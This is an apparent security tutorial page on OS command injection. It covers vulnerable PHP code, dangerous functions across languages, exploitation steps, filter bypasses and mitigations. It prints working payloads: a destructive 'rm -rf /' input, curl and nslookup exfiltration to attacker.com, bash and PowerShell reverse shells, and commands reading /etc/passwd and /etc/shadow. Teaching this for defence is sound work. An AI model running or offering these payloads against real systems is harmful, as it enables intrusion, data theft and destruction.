Command Injection Dojo

1. What is OS Command Injection?

OS Command Injection is a critical vulnerability where an attacker can execute arbitrary operating system commands on the server hosting a web application.

Why It's Dangerous:

Full server compromise
Sensitive data exposure
Complete system control
Pivoting to internal networks
Permanent backdoor installation

// Real-world example:
$email = $_GET['email'];
system("mail -s 'Notification' " . $email);
// Attacker inputs: user@example.com; rm -rf /

2. Vulnerability Requirements

For successful exploitation, these conditions must exist:

Requirement	Explanation
User input in system commands	Application passes user input to OS commands
Insufficient input validation	No proper filtering of command separators
Dangerous functions used	Direct command execution functions

3. Why Websites Are Vulnerable

Developers create vulnerabilities by:

Common Mistakes:

Using unfiltered user input in system commands
Assuming user input is safe
Using dangerous functions like system(), exec()
Not implementing proper output encoding
Blacklisting instead of allowlisting

// Vulnerable PHP code example:
$user_input = $_GET['ip'];
system("ping " . $user_input);
// Attacker can input: 8.8.8.8; cat /etc/passwd

4. Whitebox Code Review

PHP Dangerous Functions:

system(), exec(), passthru(), shell_exec(),
popen(), proc_open(), backticks (``),
pcntl_exec(), dl()

Python Dangerous Functions:

os.system(), os.popen(), subprocess.call(),
subprocess.Popen(), subprocess.run(),
commands.* (deprecated), eval()

Node.js Dangerous Functions:

child_process.exec(), child_process.execSync(),
child_process.spawn(), child_process.execFile(),
eval(), vm.runInNewContext()

Java Dangerous Classes:

Runtime.exec(), ProcessBuilder,
GroovyShell.evaluate(), ScriptEngine.eval()

5. Exploiting Command Injection

Basic Steps:

Find parameter that executes system commands such as:
* File operations (file=, dir=, path=)
* Network operations (host=, ip=, server=)
* System commands (cmd=, command=, exec=)
* Process controls (kill=, restart=, stop=)
Test with simple payload: ; whoami
Identify operating system (Linux/Windows)
Chain commands with separators
Escalate to full system access

Welcome to the Command Injection Simulator!

Try these payloads:

; whoami - Basic command
| ls -la - Pipe output
$(cat /etc/passwd) - Command substitution

> _

6. Advanced Exploitation

Blind Command Injection

When you don't see command output:

# Time-based detection
; sleep 5

# DNS exfiltration
; nslookup $(whoami).attacker.com

# HTTP exfiltration
; curl http://attacker.com/$(cat /etc/passwd | base64)

Remote Code Execution

# Reverse shell (Linux)
; bash -i >& /dev/tcp/attacker.com/4444 0>&1

# Reverse shell (Windows)
; powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

TTY Tricks

# Spawn interactive shell
; python -c 'import pty; pty.spawn("/bin/bash")'
; script -qc /bin/bash /dev/null

# Upgrade shell
; export TERM=xterm
; stty rows 24 columns 80

7. Filter Bypass Techniques

Filter	Bypass Technique	Payload Example
Spaces	Tabs, ${IFS}, braces	`{cat,/etc/passwd}`
Blacklisted words	Environment variables, encoding	`${PATH:0:1}bin${PATH:0:1}ls`
Special chars	Hex/octal encoding	`\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64`
Command blocks	Alternative separators	`%0aid` (newline)

8. Payload Arsenal

File Read

cat /etc/passwd
less /etc/shadow
head -n 10 /var/log/auth.log

System Info

uname -a
id
whoami
ps aux

File Read

type C:\Windows\win.ini
more C:\boot.ini

System Info

whoami
systeminfo
net user
ipconfig /all

9. Mitigation Strategies

Defensive Measures:

Input Validation: Strict allowlisting of characters
Parameterized APIs: Use subprocess modules safely
Sandboxing: Run with least privileges
Secure Functions: Prefer safe alternatives
Output Encoding: Properly escape output

Secure Coding Examples:

# Python safe example
import subprocess
subprocess.run(['ping', '-c', '4', user_input], shell=False)

// PHP safe example
escapeshellarg($user_input);

COMMAND INJECTION DOJO

1. What is OS Command Injection?

Why It's Dangerous:

2. Vulnerability Requirements

3. Why Websites Are Vulnerable

Common Mistakes:

4. Whitebox Code Review

PHP Dangerous Functions:

Python Dangerous Functions:

Node.js Dangerous Functions:

Java Dangerous Classes:

5. Exploiting Command Injection

Basic Steps:

6. Advanced Exploitation

Blind Command Injection

Remote Code Execution

TTY Tricks

7. Filter Bypass Techniques

8. Payload Arsenal

File Read

System Info

File Read

System Info

9. Mitigation Strategies

Defensive Measures:

Secure Coding Examples:

10. Additional Resources

Learning Materials: